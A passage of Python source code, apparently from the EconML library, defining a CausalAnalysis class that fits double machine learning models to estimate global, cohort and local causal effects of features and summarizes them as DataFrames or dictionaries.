# TODO: consider adding an API to DML that allows for better understanding of how the nuisance inputs are
# built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this
# becomes a valid approach to handling this
X_scaler = ColumnTransformer([('scale', StandardScaler(),
list(range(len(X_cont_inds))))],
remainder='passthrough').fit(np.hstack([X_xf, W])).named_transformers_['scale']
X_scaler_fixed = ColumnTransformer([('scale', _freeze(X_scaler),
list(range(len(X_cont_inds))))],
remainder='passthrough')
if W.shape[1] == 0:
# array checking routines don't accept 0-width arrays
W = None
if X_xf.shape[1] == 0:
X_xf = None
if verbose > 0:
print("CausalAnalysis: performing model selection on T model")
# perform model selection
model_t = (_first_stage_clf(WX, T, automl=nuisance_models == 'automl',
min_count=min_counts.get(feat_ind, None),
random_state=random_state, verbose=verbose)
if discrete_treatment else _first_stage_reg(WX, T, automl=nuisance_models == 'automl',
random_state=random_state,
verbose=verbose))
pipelined_model_t = Pipeline([('scale', X_scaler_fixed),
('model', model_t)])
pipelined_model_y = Pipeline([('scale', X_scaler_fixed),
('model', model_y)])
if X_xf is None and h_model == 'forest':
warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "
"because forests don't support models with no heterogeneity indices")
h_model = 'linear'
if h_model == 'linear':
est = LinearDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
fit_cate_intercept=True,
linear_first_stages=False,
categories=cats,
random_state=random_state,
cv=cv,
mc_iters=mc_iters)
elif h_model == 'forest':
est = CausalForestDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
n_estimators=4000,
min_var_leaf_on_val=True,
categories=cats,
random_state=random_state,
verbose=verbose,
cv=cv,
mc_iters=mc_iters)
if verbose > 0:
print("CausalAnalysis: tuning forest")
est.tune(y, T, X=X_xf, W=W)
if verbose > 0:
print("CausalAnalysis: training causal model")
est.fit(y, T, X=X_xf, W=W, cache_values=True)
# Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative
if h_model == 'forest' and discrete_treatment:
global_inference = est.ate__inference()
else:
# convert to NormalInferenceResults for consistency
inf = est.const_marginal_ate_inference(X=X_xf)
global_inference = NormalInferenceResults(d_t=inf.d_t, d_y=inf.d_y,
pred=inf.mean_point,
pred_stderr=inf.stderr_mean,
mean_pred_stderr=None,
inf_type='ate')
# Set the dictionary values shared between local and global summaries
if discrete_treatment:
cats = est.transformer.categories_[0]
baseline = cats[est.transformer.drop_idx_[0]]
cats = cats[np.setdiff1d(np.arange(len(cats)),
est.transformer.drop_idx_[0])]
d_t = len(cats)
insights = {
_CausalInsightsConstants.TypeKey: ['cat'] * d_t,
_CausalInsightsConstants.RawFeatureNameKey: [name] * d_t,
_CausalInsightsConstants.CategoricalColumnKey: cats.tolist(),
_CausalInsightsConstants.EngineeredNameKey: [
f"{name} (base={baseline}): {c}" for c in cats]
}
treatment_value = 1
else:
d_t = 1
cats = ["num"]
baseline = None
insights = {
_CausalInsightsConstants.TypeKey: ["num"],
_CausalInsightsConstants.RawFeatureNameKey: [name],
_CausalInsightsConstants.CategoricalColumnKey: [name],
_CausalInsightsConstants.EngineeredNameKey: [name]
}
# calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments
treatment_value = np.mean(np.abs(T[T != 0]))
result = _result(feature_index=feat_ind,
feature_name=name,
feature_baseline=baseline,
feature_levels=cats,
hinds=hinds,
X_transformer=X_transformer,
W_transformer=W_transformer,
estimator=est,
global_inference=global_inference,
treatment_value=treatment_value)
return insights, result
except Exception as e:
return e
# Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category
# required to fit a discrete DML model
_CAT_LIMIT = 10
class CausalAnalysis:
"""
Note: this class is experimental and the API may evolve over our next few releases.
Gets causal importance of features.
Parameters
----------
feature_inds: array-like of int, str, or bool
The features for which to estimate causal effects, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
categorical: array-like of int, str, or bool
The features which are categorical in nature, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None
If a 1d array, then whenever estimating a heterogeneous (local) treatment effect
model, then only the features in this array will be used for heterogeneity. If a 2d
array then its first dimension should be len(feature_inds) and whenever estimating
a local causal effect for target feature feature_inds[i], then only features in
heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features
are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if
heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_inds=None
then all features are used for heterogeneity for every target feature, and if heterogeneity_inds=[] then
no features will be used for any target feature.
feature_names: list of str, default None
The names for all of the features in the data. Not necessary if the input will be a dataframe.
If None and the input is a plain numpy array, generated feature names will be ['x0', 'x1', ...].
upper_bound_on_cat_expansion: int, default 5
The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a
feature has more than this many values, then a causal effect model is not fitted for that target feature
and a warning flag is raised. The remainder of the models are fitted.
classification: bool, default False
Whether this is a classification (as opposed to regression) task
TODO. Also enable multi-class classification (post-MVP)
nuisance_models: one of {'linear', 'automl'}, optional (default='linear')
What models to use for nuisance estimation (i.e. for estimating propensity models or models of how
controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV
(for classification) are used. If 'automl', then k-fold cross-validation and model selection are performed
among several models and the best is chosen.
TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases
of models or also integrate with azure autoML. (post-MVP)
heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear')
What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model
of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead.
TODO. Add other options, such as {'automl'} for performing
model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP)
categories: 'auto' or list of ('auto' or list of values), default 'auto'
What categories to use for the categorical columns. If 'auto', then the categories will be inferred for
all categorical columns; otherwise this argument should have as many entries as there are categorical columns,
and each entry should be either 'auto' to infer the values for that column or the list of values for the
column. If explicit values are provided, the first value is treated as the "control" value for that column
against which other values are compared.
n_jobs: int, default -1
Degree of parallelism to use when training models via joblib.Parallel
verbose : int, default=0
Controls the verbosity when fitting and predicting.
cv: int, cross-validation generator or an iterable, default 5
Determines the strategy for cross-fitting used when training causal models for each feature.
Possible inputs for cv are:
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
mc_iters: int, default 3
The number of times to rerun the first stage models to reduce the variance of the causal model nuisances.
skip_cat_limit_checks: bool, default False
By default, categorical features need to have several instances of each category in order for a model to be
fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be
required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case).
random_state : int, RandomState instance or None, default=None
Controls the randomness of the estimator. The features are always
randomly permuted at each split. When ``max_features < n_features``, the algorithm will
select ``max_features`` at random at each split before finding the best
split among them. But the best found split may vary across different
runs, even if ``max_features=n_features``. That is the case, if the
improvement of the criterion is identical for several splits and one
split has to be selected at random. To obtain a deterministic behaviour
during fitting, ``random_state`` has to be fixed to an integer.
Attributes
----------
nuisance_models_: string
The nuisance models setting used for the most recent call to fit
heterogeneity_model: string
The heterogeneity model setting used for the most recent call to fit
feature_names_: list of string
The list of feature names from the data in the most recent call to fit
trained_feature_indices_: list of int
The list of feature indices where models were trained successfully
untrained_feature_indices_: list of tuple of (int, string or Exception)
The list of indices that were requested but could not be trained successfully,
along with either a reason or caught Exception for each
"""
def __init__(self, feature_inds, categorical, heterogeneity_inds=None, feature_names=None, classification=False,
upper_bound_on_cat_expansion=5, nuisance_models='linear', heterogeneity_model='linear', *,
categories='auto', n_jobs=-1, verbose=0, cv=5, mc_iters=3, skip_cat_limit_checks=False,
random_state=None):
self.feature_inds = feature_inds
self.categorical = categorical
self.heterogeneity_inds = heterogeneity_inds
self.feature_names = feature_names
self.classification = classification
self.upper_bound_on_cat_expansion = upper_bound_on_cat_expansion
self.nuisance_models = nuisance_models
self.heterogeneity_model = heterogeneity_model
self.categories = categories
self.n_jobs = n_jobs
self.verbose = verbose
self.cv = cv
self.mc_iters = mc_iters
self.skip_cat_limit_checks = skip_cat_limit_checks
self.random_state = random_state
def fit(self, X, y, warm_start=False):
"""
Fits global and local causal effect models for each feature in feature_inds on the data
Parameters
----------
X : array-like
Feature data
y : array-like of shape (n,) or (n,1)
Outcome. If classification=True, then y should take on exactly two values; otherwise an error is raised,
since only binary classification is currently implemented.
TODO. enable multi-class classification for y (post-MVP)
warm_start : boolean, default False
If False, train models for each feature in `feature_inds`.
If True, train only models for features in `feature_inds` that had not already been trained by
the previous call to `fit`, and for which neither the corresponding heterogeneity_inds nor the
automl flag has changed. If heterogeneity_inds have changed, then the final stage model of these features
will be refit. If the automl flag has changed, then the whole model is refit, despite the warm start flag.
"""
# Validate inputs
assert self.nuisance_models in ['automl', 'linear'], (
"The only supported nuisance models are 'linear' and 'automl', "
f"but was given {self.nuisance_models}")
assert self.heterogeneity_model in ['linear', 'forest'], (
"The only supported heterogeneity models are 'linear' and 'forest' but received "
f"{self.heterogeneity_model}")
assert np.ndim(X) == 2, f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"
assert iterable(self.feature_inds), f"feature_inds should be array-like, but got {self.feature_inds}"
assert iterable(self.categorical), f"categorical should be array-like, but got {self.categorical}"
assert self.heterogeneity_inds is None or iterable(self.heterogeneity_inds), (
f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")
assert self.feature_names is None or iterable(self.feature_names), (
f"feature_names should be None or array-like, but got {self.feature_names}")
assert self.categories == 'auto' or iterable(self.categories), (
f"categories should be 'auto' or array-like, but got {self.categories}")
# TODO: check compatibility of X and Y lengths
if warm_start:
if not hasattr(self, "_results"):
# no previous fit, cancel warm start
warm_start = False
elif self._d_x != X.shape[1]:
raise ValueError(
f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")
# work with numeric feature indices, so that we can easily compare with categorical ones
train_inds = _get_column_indices(X, self.feature_inds)
if len(train_inds) == 0:
raise ValueError(
"No features specified. At least one feature index must be specified so that a model can be trained.")
heterogeneity_inds = self.heterogeneity_inds
if heterogeneity_inds is None:
heterogeneity_inds = [None for ind in train_inds]
# if heterogeneity_inds is 1D, repeat it
if heterogeneity_inds == [] or isinstance(heterogeneity_inds[0], (int, str, bool)):
heterogeneity_inds = [heterogeneity_inds for _ in train_inds]
# heterogeneity inds should be a 2D list of length same as train_inds
elif heterogeneity_inds is not None and len(heterogeneity_inds) != len(train_inds):
raise ValueError("Heterogeneity indexes should have the same number of entries, but here "
f" there were {len(heterogeneity_inds)} heterogeneity entries but "
f" {len(train_inds)} feature indices.")
# replace None elements of heterogeneity_inds and ensure indices are numeric
heterogeneity_inds = {ind: list(range(X.shape[1])) if hinds is None else _get_column_indices(X, hinds)
for ind, hinds in zip(train_inds, heterogeneity_inds)}
if warm_start:
train_y_model = False
if self.nuisance_models != self.nuisance_models_:
warnings.warn("warm_start will be ignored since the nuisance models have changed "
f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")
warm_start = False
train_y_model = True
if self.heterogeneity_model != self.heterogeneity_model_:
warnings.warn("warm_start will be ignored since the heterogeneity model has changed "
f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "
"since the previous call to fit")
warm_start = False
# TODO: bail out also if categorical columns, classification, random_state changed?
else:
train_y_model = True
# TODO: should we also train a new model_y under any circumstances when warm_start is True?
if warm_start:
new_inds = [ind for ind in train_inds if (ind not in self._cache or
heterogeneity_inds[ind] != self._cache[ind][1].hinds)]
else:
new_inds = list(train_inds)
self._cache = {} # store mapping from feature to insights, results
# train the Y model
if train_y_model:
# perform model selection for the Y model using all X, not on a per-column basis
allX = ColumnTransformer([('encode',
OneHotEncoder(
drop='first', sparse=False),
self.categorical)],
remainder=StandardScaler()).fit_transform(X)
if self.verbose > 0:
print("CausalAnalysis: performing model selection on overall Y model")
if self.classification:
self._model_y = _first_stage_clf(allX, y, automl=self.nuisance_models == 'automl',
make_regressor=True,
random_state=self.random_state, verbose=self.verbose)
else:
self._model_y = _first_stage_reg(allX, y, automl=self.nuisance_models == 'automl',
random_state=self.random_state, verbose=self.verbose)
if self.classification:
# now that we've trained the classifier and wrapped it, ensure that y is transformed to
# work with the regression wrapper
# we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays
y = column_or_1d(y).reshape(-1, 1)
# note that this needs to happen after wrapping to generalize to the multi-class case,
# since otherwise we'll have too many columns to be able to train a classifier
y = OneHotEncoder(drop='first', sparse=False).fit_transform(y)
assert y.ndim == 1 or y.shape[1] == 1, ("Multiclass classification isn't supported" if self.classification
else "Only a single outcome is supported")
self._vec_y = y.ndim == 1
self._d_x = X.shape[1]
# start with empty results and default shared insights
self._results = []
self._shared = _get_default_shared_insights_output()
self._shared[_CausalInsightsConstants.InitArgsKey] = {
'feature_inds': _sanitize(self.feature_inds),
'categorical': _sanitize(self.categorical),
'heterogeneity_inds': _sanitize(self.heterogeneity_inds),
'feature_names': _sanitize(self.feature_names),
'classification': _sanitize(self.classification),
'upper_bound_on_cat_expansion': _sanitize(self.upper_bound_on_cat_expansion),
'nuisance_models': _sanitize(self.nuisance_models),
'heterogeneity_model': _sanitize(self.heterogeneity_model),
'categories': _sanitize(self.categories),
'n_jobs': _sanitize(self.n_jobs),
'verbose': _sanitize(self.verbose),
'random_state': _sanitize(self.random_state)
}
# convert categorical indicators to numeric indices
categorical_inds = _get_column_indices(X, self.categorical)
categories = self.categories
if categories == 'auto':
categories = ['auto' for _ in categorical_inds]
else:
assert len(categories) == len(categorical_inds), (
"If categories is not 'auto', it must contain one entry per categorical column. Instead, categories"
f"has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")
# check for indices over the categorical expansion bound
invalid_inds = getattr(self, 'untrained_feature_indices_', [])
# assume we'll be able to train former failures this time; we'll add them back if not
invalid_inds = [(ind, reason) for (ind, reason) in invalid_inds if ind not in new_inds]
self._has_column_names = True
if self.feature_names is None:
if hasattr(X, "iloc"):
feature_names = X.columns
else:
self._has_column_names = False
feature_names = [f"x{i}" for i in range(X.shape[1])]
else:
feature_names = self.feature_names
self.feature_names_ = feature_names
min_counts = {}
for ind in new_inds:
column_text = self._format_col(ind)
if ind in categorical_inds:
cats, counts = np.unique(_safe_indexing(X, ind, axis=1), return_counts=True)
min_ind = np.argmin(counts)
n_cat = len(cats)
if n_cat > self.upper_bound_on_cat_expansion:
warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "
f"values (found {n_cat}) so no heterogeneity model will be fit for it; "
"increase 'upper_bound_on_cat_expansion' to change this behavior.")
# can't remove in place while iterating over new_inds, so store in separate list
invalid_inds.append((ind, 'upper_bound_on_cat_expansion'))
elif counts[min_ind] < _CAT_LIMIT:
if self.skip_cat_limit_checks and (counts[min_ind] >= 5 or
(counts[min_ind] >= 2 and
self.heterogeneity_model != 'forest')):
# train the model, but warn
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "
"A model will still be fit because 'skip_cat_limit_checks' is True, "
"but this model may not be robust.")
min_counts[ind] = counts[min_ind]
elif counts[min_ind] < 2 or (counts[min_ind] < 5 and self.heterogeneity_model == 'forest'):
# no model can be trained in this case since we need more folds
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
"the training dataset, but linear heterogeneity models need at least 2 and "
"forest heterogeneity models need at least 5 instances, so no model will be fit "
"for this column")
invalid_inds.append((ind, 'cat_limit'))
else:
# don't train a model, but suggest a workaround since there are enough instances of the least
# populated class
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "
"so no heterogeneity model will be fit for it. This check can be turned off by "
"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "
"model for this feature.")
invalid_inds.append((ind, 'cat_limit'))
for (ind, _) in invalid_inds:
new_inds.remove(ind)
# also remove from train_inds so we don't try to access the result later
train_inds.remove(ind)
if len(train_inds) == 0:
raise ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "
"are several instances of each categorical value so that at least "
"one feature model can be trained.")
# extract subset of names matching new columns
new_feat_names = _safe_indexing(feature_names, new_inds)
cache_updates = dict(zip(new_inds,
joblib.Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(joblib.delayed(_process_feature)(
feat_name, feat_ind,
self.verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
self.nuisance_models, self.heterogeneity_model, self.random_state, self._model_y,
self.cv, self.mc_iters)
for feat_name, feat_ind in zip(new_feat_names, new_inds))))
# track indices where an exception was thrown, since we can't remove from dictionary while iterating
inds_to_remove = []
for ind, value in cache_updates.items():
if isinstance(value, Exception):
# don't want to cache this failed result
inds_to_remove.append(ind)
train_inds.remove(ind)
invalid_inds.append((ind, value))
for ind in inds_to_remove:
del cache_updates[ind]
self._cache.update(cache_updates)
for ind in train_inds:
dict_update, result = self._cache[ind]
self._results.append(result)
for k in dict_update:
self._shared[k] += dict_update[k]
invalid_inds.sort()
self.untrained_feature_indices_ = invalid_inds
self.trained_feature_indices_ = train_inds
self.nuisance_models_ = self.nuisance_models
self.heterogeneity_model_ = self.heterogeneity_model
return self
def _format_col(self, ind):
if self._has_column_names:
return f"Column {ind} ({self.feature_names_[ind]})"
else:
return f"Column {ind}"
# properties to return from effect InferenceResults
@staticmethod
def _point_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'point_estimate'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int(alpha=alpha)[1])]
# properties to return from PopulationSummaryResults
@staticmethod
def _summary_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'mean_point'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr_mean'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int_mean(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int_mean(alpha=alpha)[1])]
# Converts strings to property lookups or method calls as a convenience so that the
# _point_props and _summary_props above can be applied to an inference object
@staticmethod
def _make_accessor(attr):
if isinstance(attr, str):
s = attr
def attr(o):
val = getattr(o, s)
if callable(val):
return val()
else:
return val
return attr
# Create a summary combining all results into a single output; this is used
# by the various causal_effect and causal_effect_dict methods to generate either a dataframe
# or a dictionary, respectively, based on the summary function passed into this method
def _summarize(self, *, summary, get_inference, props, expand_arr, drop_sample):
assert hasattr(self, "_results"), "This object has not been fit, so cannot get results"
# ensure array has shape (m,y,t)
def ensure_proper_dims(arr):
if expand_arr:
# population summary is missing sample dimension; add it for consistency
arr = np.expand_dims(arr, 0)
if self._vec_y:
# outcome dimension is missing; add it for consistency
arr = np.expand_dims(arr, axis=1)
assert 2 <= arr.ndim <= 3
# add singleton treatment dimension if missing
return arr if arr.ndim == 3 else np.expand_dims(arr, axis=2)
# store set of inference results so we don't need to recompute per-attribute below in summary/coalesce
infs = [get_inference(res) for res in self._results]
# each attr has dimension (m,y) or (m,y,t)
def coalesce(attr):
"""Join together the arrays for each feature"""
attr = self._make_accessor(attr)
# concatenate along treatment dimension
arr = np.concatenate([ensure_proper_dims(attr(inf))
for inf in infs], axis=2)
# for dictionary representation, want to remove unneeded sample dimension
# in cohort and global results
if drop_sample:
arr = np.squeeze(arr, 0)
return arr
return summary([(key, coalesce(val)) for key, val in props])
def _pandas_summary(self, get_inference, *, props, n,
expand_arr=False, keep_all_levels=False):
"""
Summarizes results into a dataframe.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
n : int
The number of samples in the dataset
expand_arr : boolean, default False
Whether to add a synthetic sample dimension to the result arrays when performing internal computations
keep_all_levels : boolean, default False
Whether to keep all levels, even when they don't take on more than one value;
Note that regardless of this argument the "sample" level will only be present if expand_arr is False
"""
def make_dataframe(props):
to_include = OrderedDict([(key, value.reshape(-1))
for key, value in props])
# TODO: enrich outcome logic for multi-class classification when that is supported
index = pd.MultiIndex.from_tuples([(i, outcome, res.feature_name, f"{lvl}v{res.feature_baseline}"
if res.feature_baseline is not None
else lvl)
for i in range(n)
for outcome in ["y0"]
for res in self._results
for lvl in res.feature_levels],
names=["sample", "outcome", "feature", "feature_value"])
if expand_arr:
# There is no actual sample level in this data
index = index.droplevel("sample")
if not keep_all_levels:
for lvl in index.levels:
if len(lvl) == 1:
if not isinstance(index, pd.MultiIndex):
# can't drop only level
index = pd.Index([self._results[0].feature_name], name="feature")
else:
index = index.droplevel(lvl.name)
return pd.DataFrame(to_include, index=index)
return self._summarize(summary=make_dataframe,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=False) # dropping the sample dimension is handled above instead
def _dict_summary(self, get_inference, *, n, props, kind, drop_sample=False, expand_arr=False, row_wise=False):
"""
Summarizes results into a dictionary.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
n : int
The number of samples in the dataset
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
kind : string
The kind of inference results to get (e.g. 'global', 'local', or 'cohort')
drop_sample : boolean, default False
Whether to drop the sample dimension from each array
expand_arr : boolean, default False
Whether to add an initial sample dimension to the result arrays
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
"""
def make_dict(props):
# should be serialization-ready and contain no numpy arrays
res = _get_default_specific_insights(kind)
shared = self._shared
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
shared = shared.copy() # copy so that we can modify without affecting shared state
# TODO: Note that there's no column metadata for the sample number - should there be?
for k in _get_column_causal_insights_keys():
# need to replicate the column info for each sample, then remove from the shared data
row_data[k] = shared[k] * n
del shared[k]
# NOTE: the flattened order has the output dimension before the feature dimension
# which may need to be revisited once we support multiclass
row_data.update([(key, value.flatten()) for key, value in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, value.tolist()) for key, value in props])
return {**shared, **res}
return self._summarize(summary=make_dict,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=drop_sample)
def global_causal_effect(self, *, alpha=0.05, keep_all_levels=False):
"""
Get the global causal effect for each feature as a pandas DataFrame.
Parameters
----------
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}',
'{cat}v{base}'] where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
# a global inference indicates the effect of that one feature on the outcome
return self._pandas_summary(lambda res: res.global_inference, props=self._point_props(alpha),
n=1, expand_arr=True, keep_all_levels=keep_all_levels)
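# Illustrative sketch (hypothetical feature names): with a numeric 'age' and a categorical
# 'plan' whose baseline level is 'A',
#     eff = ca.global_causal_effect()
#     eff.loc['age']            # single 'num' row for the numeric feature
#     eff.loc[('plan', 'BvA')]  # effect of level B relative to the baseline A
# with the point/stderr/zstat/pvalue/ci columns documented above.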
def _global_causal_effect_dict(self, *, alpha=0.05, row_wise=False):
"""
Gets the global causal effect for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(lambda res: res.global_inference, props=self._point_props(alpha),
kind='global', n=1, row_wise=row_wise, drop_sample=True, expand_arr=True)
def _cohort_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
return est.const_marginal_ate_inference(X=X)
return inference_from_result
def cohort_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the average causal effects for a particular cohort defined by a population of X's.
Parameters
----------
Xtest : array-like
The cohort samples for which to return the average causal effects within cohort
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
cohort_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._cohort_effect_inference(Xtest),
props=self._summary_props(alpha), n=1,
expand_arr=True, keep_all_levels=keep_all_levels)
def _cohort_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the cohort causal effects for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._cohort_effect_inference(Xtest), props=self._summary_props(alpha),
kind='cohort', n=1, row_wise=row_wise, expand_arr=True, drop_sample=True)
def _local_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
eff = est.const_marginal_effect_inference(X=X)
if X is None:
# need to reshape the output to match the input
eff = eff._expand_outputs(Xtest.shape[0])
return eff
return inference_from_result
def local_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the local causal effect for each feature as a pandas DataFrame.
Parameters
----------
Xtest : array-like
The samples for which to return the causal effects
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
local_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['sample', 'feature', 'feature_value']
:Rows: For each feature that is numeric, we have an entry with index
['{sampleid}', '{feature_name}', 'num'],
where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is
the index of the sample in Xtest.
For each feature that is categorical, we have an entry with index
['{sampleid}', '{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._local_effect_inference(Xtest),
props=self._point_props(alpha), n=Xtest.shape[0], keep_all_levels=keep_all_levels)
def _local_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the local feature importance as dictionary
Dictionary entries for predictions, etc. will be nested lists of shape (n_rows, d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._local_effect_inference(Xtest), props=self._point_props(alpha),
kind='local', n=Xtest.shape[0], row_wise=row_wise)
def _safe_result_index(self, X, feature_index):
assert hasattr(self, "_results"), "This instance has not yet been fitted"
assert np.ndim(X) == 2 and np.shape(X)[1] == self._d_x, (
"Shape of X must be compatible with shape of the fitted X, "
f"but got shape {np.shape(X)} instead of (n, {self._d_x})"
)
(numeric_index,) = _get_column_indices(X, [feature_index])
bad_inds = dict(self.untrained_feature_indices_)
if numeric_index in bad_inds:
error = bad_inds[numeric_index]
col_text = self._format_col(numeric_index)
if error == 'cat_limit':
msg = f"{col_text} had a value with fewer than {_CAT_LIMIT} occurences, so no model was fit for it"
elif error == 'upper_bound_on_cat_expansion':
msg = (f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "
"so no model was fit for it")
else:
msg = (f"{col_text} generated the following error during fitting, "
f"so no model was fit for it:\n{str(error)}")
raise ValueError(msg)
if numeric_index not in self.trained_feature_indices_:
raise ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "
"so no model was fit for it")
results = [res for res in self._results
if res.feature_index == numeric_index]
assert len(results) == 1
(result,) = results
return result
